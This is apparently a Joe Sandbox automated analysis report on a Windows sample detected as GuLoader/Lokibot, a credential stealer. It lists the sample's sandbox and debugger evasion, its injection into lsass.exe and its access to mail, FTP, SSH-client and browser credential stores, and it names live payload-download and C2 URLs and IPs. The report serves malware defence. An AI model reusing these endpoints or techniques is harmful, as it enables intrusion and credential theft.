          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: 2GirCpksIO.exe, 00000001.00000002.6229518828.000000000057D000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEGK
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
          Source: 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://AFROCOMPASS.COM/KARINEDOCESESALGADOS_HPISWWHAOD1.BIN
          Source: C:\Users\user\Desktop\2GirCpksIO.exe TID: 400Thread sleep count: 103 > 30
          Source: C:\Users\user\Desktop\2GirCpksIO.exe TID: 400Thread sleep time: -6180000s >= -30000s
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread delayed: delay time: 60000
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSystem information queried: ModuleInformation
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: lsass.exe, 0000000A.00000002.10832697101.000001CE614A8000.00000004.00000001.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: lsass.exe, 0000000A.00000002.10832697101.000001CE614A8000.00000004.00000001.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicvss
          Source: 2GirCpksIO.exe, 00000001.00000002.6229518828.000000000057D000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exegk
          Source: 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin
          Source: 2GirCpksIO.exe, 00000005.00000002.10832382957.0000000000883000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: lsass.exe, 0000000A.00000002.10832697101.000001CE614A8000.00000004.00000001.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
          Source: lsass.exe, 0000000A.00000000.6700942689.000001CE61413000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D202D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1EE31 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1B87D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1E553 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D218A6 RtlAddVectoredExceptionHandler,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory written: C:\Windows\System32\lsass.exe base: 1CE61340000
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory written: C:\Windows\System32\lsass.exe base: 1CE622D0000
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1CE61340000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1CE622D0000 protect: page execute and read and write
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread created: C:\Windows\System32\lsass.exe EIP: 61340000
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: UserOOBEBroker.exe, 00000004.00000002.10832382850.000001C6E9220000.00000002.00020000.sdmp, 2GirCpksIO.exe, 00000005.00000002.10833760693.0000000000FE0000.00000002.00020000.sdmpBinary or memory string: PProgram Manager/
          Source: UserOOBEBroker.exe, 00000004.00000002.10832382850.000001C6E9220000.00000002.00020000.sdmp, 2GirCpksIO.exe, 00000005.00000002.10833760693.0000000000FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: UserOOBEBroker.exe, 00000004.00000002.10832382850.000001C6E9220000.00000002.00020000.sdmp, 2GirCpksIO.exe, 00000005.00000002.10833760693.0000000000FE0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 2GirCpksIO.exe PID: 4560, type: MEMORYSTR
          GuLoader behavior detectedShow sources
          Source: Initial fileSignature Results: GuLoader behavior
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentialsShow sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 2GirCpksIO.exe PID: 4560, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection312Masquerading1OS Credential Dumping2Security Software Discovery311Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion221Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection312Security Account ManagerVirtualization/Sandbox Evasion221SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSystem Information Discovery4Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2GirCpksIO.exe32%VirustotalBrowse
          2GirCpksIO.exe20%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          afrocompass.com4%VirustotalBrowse
          karinedocesesalgados.com.br8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.microso0%Avira URL Cloudsafe
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0%Avira URL Cloudsafe
          http://karinedocesesalgados.com.br/nedo/five/fre.php0%Avira URL Cloudsafe
          https://afrocompass.com/k0%Avira URL Cloudsafe
          https://karinedocesesalgados.com.br/nedo/five/fre.php0%Avira URL Cloudsafe
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0;0%Avira URL Cloudsafe
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin_0%Avira URL Cloudsafe
          https://afrocompass.com/karinedocesesalgados_Hpi0%Avira URL Cloudsafe
          https://afrocompass.com/c0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          afrocompass.com
          		68.66.226.70
          		truetrueunknown
          karinedocesesalgados.com.br
          		192.185.217.246
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.binfalse
          • Avira URL Cloud: safe
          		unknown
          http://karinedocesesalgados.com.br/nedo/five/fre.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://afrocompass.com/karinedocesesalgados_Hpitrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.microsoUserOOBEBroker.exe, 00000004.00000002.10830879380.000001C6E8B00000.00000002.00020000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpfalse
            		high
            http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6700942689.000001CE61413000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpfalse
                		high
                http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpfalse
                    		high
                    https://afrocompass.com/k2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://karinedocesesalgados.com.br/nedo/five/fre.php2GirCpksIO.exe, 00000005.00000002.10832583099.0000000000898000.00000004.00000020.sdmp, 2GirCpksIO.exe, 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpfalse
                      		high
                      https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0;2GirCpksIO.exe, 00000005.00000002.10832026164.0000000000859000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.live.comlsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpfalse
                        		high
                        http://www.msn.comlsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpfalse
                            		high
                            http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpfalse
                              		high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpfalse
                                		high
                                https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin_2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://afrocompass.com/c2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.185.217.246
                                		karinedocesesalgados.com.brUnited States
                                		46606UNIFIEDLAYER-AS-1UStrue
                                68.66.226.70
                                		afrocompass.comUnited States
                                		55293A2HOSTINGUStrue

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:526365
                                Start date:22.11.2021
                                Start time:15:25:41
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 0s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:2GirCpksIO.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.evad.winEXE@4/4@2/2
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HDC Information:Failed
                                HCA Information:Failed
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe
                                • HTTP Packets have been reduced
                                • TCP Packets have been reduced to 100
                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, wdcp.microsoft.com, arc.msn.com, nexusrules.officeapps.live.com
                                • Execution Graph export aborted for target lsass.exe, PID 1016 because there are no executed function
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:29:08API Interceptor488x Sleep call for process: 2GirCpksIO.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                192.185.217.246Solicitud de Pedido N#U00ba 111700028645.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/nedo/five/fre.php
                                vG6lhNUgFa.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/nedo/five/fre.php
                                Global Proteccion y Seguridad SL pedido_N_202100027.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                Global Proteccion y Seguridad SL pedido_N_202100027.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                Factura FAN CourierFAN Courier Invoice 7038848_pdf.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                Orden de compra n_ 393116209.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                ENERGOTEHNICA SRL - Oferta PGAOFV0042676.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                PEDIDO 002065-0091 GRUPO INTASAL S.L.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                CERERE URGENTA DE COTARE PENTRU PRODUSELE DVS.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                zIpwVgDM5G.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                Demande de commande urgente No E2102468.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php
                                SecuriteInfo.com.Trojan.Win32.Save.a.29564.exeGet hashmaliciousBrowse
                                • karinedocesesalgados.com.br/karin/five/fre.php

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                karinedocesesalgados.com.brSolicitud de Pedido N#U00ba 111700028645.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                vG6lhNUgFa.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                Global Proteccion y Seguridad SL pedido_N_202100027.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                Global Proteccion y Seguridad SL pedido_N_202100027.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                Factura FAN CourierFAN Courier Invoice 7038848_pdf.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                Orden de compra n_ 393116209.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                ENERGOTEHNICA SRL - Oferta PGAOFV0042676.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                PEDIDO 002065-0091 GRUPO INTASAL S.L.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                CERERE URGENTA DE COTARE PENTRU PRODUSELE DVS.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                zIpwVgDM5G.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                Demande de commande urgente No E2102468.exeGet hashmaliciousBrowse
                                • 192.185.217.246
                                SecuriteInfo.com.Trojan.Win32.Save.a.29564.exeGet hashmaliciousBrowse
                                • 192.185.217.246

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                A2HOSTINGUSATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                • 68.66.206.150
                                SecuriteInfo.com.Trojan.Siggen15.46065.1499.exeGet hashmaliciousBrowse
                                • 68.66.226.95
                                Pago Transferencia.pdf.exeGet hashmaliciousBrowse
                                • 85.187.128.246
                                Pay stub for s3gov.com Employees.htmlGet hashmaliciousBrowse
                                • 68.66.226.75
                                DOC_1003394276473336675207.docmGet hashmaliciousBrowse
                                • 209.124.90.7
                                Report.docmGet hashmaliciousBrowse
                                • 209.124.90.7
                                Pay stub for stonergroup.com Employee.htmlGet hashmaliciousBrowse
                                • 68.66.226.75
                                Company profile.exeGet hashmaliciousBrowse
                                • 70.32.23.95
                                Cotizacion.pdf.exeGet hashmaliciousBrowse
                                • 85.187.128.246
                                Drawing & Company Profile.exeGet hashmaliciousBrowse
                                • 185.146.22.236
                                Paystub for strundle@alarm.com.htmlGet hashmaliciousBrowse
                                • 68.66.226.75
                                Pago-20210511.exeGet hashmaliciousBrowse
                                • 85.187.128.246
                                h3SFZEdlT0.dllGet hashmaliciousBrowse
                                • 185.146.22.232
                                NEaRhAVeo9Get hashmaliciousBrowse
                                • 185.146.23.58
                                mipselGet hashmaliciousBrowse
                                • 185.146.23.53
                                lF3mtKMEWz.rtfGet hashmaliciousBrowse
                                • 185.146.22.238
                                583475.exeGet hashmaliciousBrowse
                                • 68.66.224.28
                                SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                • 185.146.22.233
                                PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                • 185.146.22.233
                                PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                • 185.146.22.233
                                UNIFIEDLAYER-AS-1USPago.Recibo.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                Pago.Recibo.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                Pago.Recibo.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                New Order 000112221.exeGet hashmaliciousBrowse
                                • 74.220.199.6
                                urgent quotation CN# 1400005567.exeGet hashmaliciousBrowse
                                • 192.185.84.191
                                IRq0c4lGEaW9MTr.exeGet hashmaliciousBrowse
                                • 192.185.84.191
                                New Order & Inquiry (Clearwin Co., LTD).exeGet hashmaliciousBrowse
                                • 192.185.129.69
                                eh.x86Get hashmaliciousBrowse
                                • 76.162.184.187
                                202111161629639000582.exeGet hashmaliciousBrowse
                                • 162.240.7.241
                                PnZZljbD6PGet hashmaliciousBrowse
                                • 96.125.162.157
                                AbLqXNtszz.exeGet hashmaliciousBrowse
                                • 74.220.199.6
                                apep.armGet hashmaliciousBrowse
                                • 173.83.209.221
                                Offer quotation2021.xlsxGet hashmaliciousBrowse
                                • 162.241.226.37
                                swift.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                eFax document 805428.htmlGet hashmaliciousBrowse
                                • 69.49.244.145
                                eFax document 805428.htmlGet hashmaliciousBrowse
                                • 69.49.244.145
                                Confirmacion & Pago Fecha.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                ITALY ORDER.vbsGet hashmaliciousBrowse
                                • 162.241.148.206
                                Confirmacion & Pago Fecha.xlsGet hashmaliciousBrowse
                                • 192.185.113.96
                                Confirmacion & Pago Fecha.xlsGet hashmaliciousBrowse
                                • 192.185.113.96

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                37f463bf4616ecd445d4a1937da06e19HP7DYSoP6M.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                yRqB5VANT3.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                n#U00ba410000512664.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                1Fu7t9XR6E.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                justificante de la transfer.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                justificante de la transfer.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                7A0h5A8BmF.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                AP_Remittance_SWT130003815_0.htmlGet hashmaliciousBrowse
                                • 68.66.226.70
                                TEVRKPBK.EXEGet hashmaliciousBrowse
                                • 68.66.226.70
                                ATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                202111161629639000582.exeGet hashmaliciousBrowse
                                • 68.66.226.70
                                6wV8uoO6lW.exeGet hashmaliciousBrowse
